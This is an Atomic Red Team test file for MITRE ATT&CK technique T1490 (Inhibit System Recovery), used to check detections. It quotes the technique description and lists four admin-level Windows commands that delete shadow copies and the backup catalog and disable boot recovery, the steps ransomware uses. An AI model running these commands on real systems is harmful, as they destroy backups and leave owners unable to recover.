atomic-red-team/atomics/T1490/T1490.md

# T1490 - Inhibit System Recovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1490)
<blockquote>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code></blockquote>

## Atomic Tests

- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)

- [Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI](#atomic-test-2---windows---delete-volume-shadow-copies-via-wmi)

- [Atomic Test #3 - Windows - Delete Windows Backup Catalog](#atomic-test-3---windows---delete-windows-backup-catalog)

- [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair)


<br/>

## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.

**Supported Platforms:** Windows


#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
```
vssadmin.exe delete shadows /all /quiet
```



<br/>
<br/>

## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.

**Supported Platforms:** Windows


#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
```
wmic.exe shadowcopy delete
```



<br/>
<br/>

## Atomic Test #3 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.

**Supported Platforms:** Windows


#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
```
wbadmin.exe delete catalog -quiet
```



<br/>
<br/>

## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot. 
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.

**Supported Platforms:** Windows


#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
```
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```



<br/>